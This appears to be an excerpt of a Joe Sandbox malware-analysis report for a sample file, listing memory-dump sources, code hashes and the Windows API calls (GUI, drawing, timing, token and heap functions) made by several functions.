Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3fe10f15d8e723286cfa2761a4c41e885131f0ab76326f37679bfb5fdb2682
Instruction ID: a10d327ecc612441224139379f9f69045adc32833504c9c3c8c48bc195cb5051
Opcode Fuzzy Hash: ca3fe10f15d8e723286cfa2761a4c41e885131f0ab76326f37679bfb5fdb2682
Instruction Fuzzy Hash: FE418235E04508AFEB10EB28CC4DFE9BBA4EB09320F150266E915A72E1D770AD55FB51

Function 00F02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F02357
ScreenToClient.USER32(00FC57B0,?), ref: 00F02374
GetAsyncKeyState.USER32(00000001), ref: 00F02399
GetAsyncKeyState.USER32(00000002), ref: 00F023A7

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 00beece174988432655197c79df723d6f646cef792fcdbc079923b28501bba66
Instruction ID: 95571d8aca81c18a2295057d2fad2a35ad9871dce989c8f51955d855ec26297e
Opcode Fuzzy Hash: 00beece174988432655197c79df723d6f646cef792fcdbc079923b28501bba66
Instruction Fuzzy Hash: 17416F75A04119FBCF199FA8CC48AEDBB75BB05374F204319E829E62D0CB349954FBA1

Function 00F563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00F56433
TranslateMessage.USER32(?), ref: 00F5645C
DispatchMessageW.USER32(?), ref: 00F56466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F56475

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 8fe1612e8fbd8a33edbdee74d6ac8130cbce354b38008110db026d10f692c517
Instruction ID: 61566609146206e178a5bec656fd270580b6c96f059036f75b2d30b0f83f3da0
Opcode Fuzzy Hash: 8fe1612e8fbd8a33edbdee74d6ac8130cbce354b38008110db026d10f692c517
Instruction Fuzzy Hash: D531C43190064AAFDB64CFB0CD45FF67BA8AB01722F940165EA31C71A1E725A4CDF760

Function 00F58A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F58A30
PostMessageW.USER32(?,00000201,00000001), ref: 00F58ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F58AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00F58AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F58AF8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
Instruction ID: 48a717f92db23b6a33711b6a5c44c9e85c6a8823a8017ca0237d97159143dcb8
Opcode Fuzzy Hash: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
Instruction Fuzzy Hash: 2131CF71900219EFDB14CF68D94CAAE3BA5EB04326F104229FA25E71D1C7B49919EB90

Function 00F5B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00F5B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F5B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F5B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F5B27F
_wcsstr.LIBCMT ref: 00F5B289

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 60d2d4b4e320aab7b9d9d29740209492e5d56b129dfac88186a111de61679b37
Instruction ID: d17d338a5b590c13227749aa21e0ca164f3f2cbb42bcb339e708a51b91d34b59
Opcode Fuzzy Hash: 60d2d4b4e320aab7b9d9d29740209492e5d56b129dfac88186a111de61679b37
Instruction Fuzzy Hash: 88212232604204BAEB269B39AC09E7F7B98DF49721F108129FD04CA1A1EF658C44B3A0

Function 00F8B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

GetWindowLongW.USER32(?,000000F0), ref: 00F8B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F8B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F8B1CF
GetSystemMetrics.USER32(00000004), ref: 00F8B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F70E90,00000000), ref: 00F8B216

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 8d4b20718bd191359af944e82732e128d8a79734136fe798e5e648c8bc142e65
Instruction ID: 68d41c0ab9f276e89037432eb6373ab86c100a3adadbb37db4c0c0478a9e6f8b
Opcode Fuzzy Hash: 8d4b20718bd191359af944e82732e128d8a79734136fe798e5e648c8bc142e65
Instruction Fuzzy Hash: D1217171910655AFCB11AF38DC18BAA7BA4FB05771F154728F932DB1E0E7309851EB90

Function 00F59307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F59320

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59352
__itow.LIBCMT ref: 00F5936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59392
__itow.LIBCMT ref: 00F593A3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 986c058f45d5c7fb861272eb73de729160462fd4193cc3cd951dfbd323841eda
Instruction ID: 3eb5911c0eac432a517d24c6165fe76f237b47d3c934c7fed3737c8ba78e8dac
Opcode Fuzzy Hash: 986c058f45d5c7fb861272eb73de729160462fd4193cc3cd951dfbd323841eda
Instruction Fuzzy Hash: 3721D331B04308EBDB14AAA09C89EEE7BACEB88721F044065FE04D71C0D6B4DD49B791

Function 00F75A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F75A6E
GetForegroundWindow.USER32 ref: 00F75A85
GetDC.USER32(00000000), ref: 00F75AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00F75ACD
ReleaseDC.USER32(00000000,00000003), ref: 00F75B08

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: dfa09cb7d905317ce3f55e622cd4ffd5c53e02c80f90f6156998aef322082d07
Instruction ID: 2f9aa79a686a1bb143c6d6d90a59294ccd6a19aac10c793e78353059de2d8357
Opcode Fuzzy Hash: dfa09cb7d905317ce3f55e622cd4ffd5c53e02c80f90f6156998aef322082d07
Instruction Fuzzy Hash: 4B21C675A00104AFDB00EF64DC84AAABBF5EF48350F14C179F849D7352DA74AD05EB51

Function 00F012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
SelectObject.GDI32(?,00000000), ref: 00F0135C
BeginPath.GDI32(?), ref: 00F01373
SelectObject.GDI32(?,00000000), ref: 00F0139C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d5b4ced404c95b62c95ac233866de254123bb0ad5f53cdecf90dc99cc13b82ea
Instruction ID: 54a8c76f059b768da2226c091c8d2a9d8d240abb4ced8427d7bddbe80c9d3075
Opcode Fuzzy Hash: d5b4ced404c95b62c95ac233866de254123bb0ad5f53cdecf90dc99cc13b82ea
Instruction Fuzzy Hash: CF215C3180060CEFDB109F25DE0ABA97BA8FB00B61F544226F810971F0D771A895FF90

Function 00F64A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F64ABA
__beginthreadex.LIBCMT ref: 00F64AD8
MessageBoxW.USER32(?,?,?,?), ref: 00F64AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F64B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F64B0A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 919f6e4a1665137beda5567a87563d09da0b9cdd53678f3c65710dc97080c342
Instruction ID: 185ceb8da0ec3f28b67476391b7429d41f640bf2d708750a830fd7cd3c8f0895
Opcode Fuzzy Hash: 919f6e4a1665137beda5567a87563d09da0b9cdd53678f3c65710dc97080c342
Instruction Fuzzy Hash: C511087690461CBFC700AFA8EC09EEB7FACEB45720F144265F815D3250D675E944ABA0

Function 00F58202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F5821E
GetLastError.KERNEL32(?,00F57CE2,?,?,?), ref: 00F58228
GetProcessHeap.KERNEL32(00000008,?,?,00F57CE2,?,?,?), ref: 00F58237
HeapAlloc.KERNEL32(00000000,?,00F57CE2,?,?,?), ref: 00F5823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F58255

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
Instruction ID: 9fc3afbc0874f9984cbc138bead2c3303298bd16202e0fdc351dfe4f485ab81c
Opcode Fuzzy Hash: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
Instruction Fuzzy Hash: F3016271600608BFDB104FA6DC48DB77F6CFF857A5B500529FD09D2120DA318C15EB60

Function 00F5710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?,?,00F57455), ref: 00F57127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?), ref: 00F57160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F5716C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 40f032f6c48afb45aadf14568c021d6de1e683df166fd696d9ce5df74ecf1147
Instruction ID: 97aadd42b7fb70afc2001ccce639b4b0b899e66153cde8cdc4c401936dd58704
Opcode Fuzzy Hash: 40f032f6c48afb45aadf14568c021d6de1e683df166fd696d9ce5df74ecf1147
Instruction Fuzzy Hash: D7018F72A01718BFDB115F65EC44BAA7BADEF447A2F140064FE08D2220DB31DD48ABA0

Function 00F65244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F6526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F65280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: b69a8bde6049e8becadbd4404ed74844bbf43c462bba5f20c0335142f660fc42
Instruction ID: 154c077a9310ef7bff68e3aa09d6725bacd5ef59e4ad3ead1fa41a31777cbedf
Opcode Fuzzy Hash: b69a8bde6049e8becadbd4404ed74844bbf43c462bba5f20c0335142f660fc42
Instruction Fuzzy Hash: 9B011771D01A2DDBCF00EFE4EC99AEDBB78BB09B11F400556E941F2145CB309554A7A1

Function 00F5810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F5812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58157

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
Instruction ID: 5933bc12454caf0675866fd43e7eff7018ffd89be792831af6d08472377caf3e
Opcode Fuzzy Hash: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
Instruction Fuzzy Hash: CEF06271600708AFEB111FA5EC8CEB73BACFF497A5B100025FA45D6150DB619D4AFB60

Function 00F5C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00F5C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00F5C20E
MessageBeep.USER32(00000000), ref: 00F5C226
KillTimer.USER32(?,0000040A), ref: 00F5C242
EndDialog.USER32(?,00000001), ref: 00F5C25C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 3f182ad2fa2024d3abee1f86a2834feaa1f62993d74a6a42eb6fb91996fd33a7
Instruction ID: 595d28b1740f170055cd65d9e7e45f814d82933dc88df396f81871a59811dc50
Opcode Fuzzy Hash: 3f182ad2fa2024d3abee1f86a2834feaa1f62993d74a6a42eb6fb91996fd33a7
Instruction Fuzzy Hash: 600167309047089FEB205B54DD4EBA67778BB00706F000669AA83E14E1DBE4699CAB90

Function 00F013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00F013BF
StrokeAndFillPath.GDI32(?,?,00F3B888,00000000,?), ref: 00F013DB
SelectObject.GDI32(?,00000000), ref: 00F013EE
DeleteObject.GDI32 ref: 00F01401
StrokePath.GDI32(?), ref: 00F0141C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

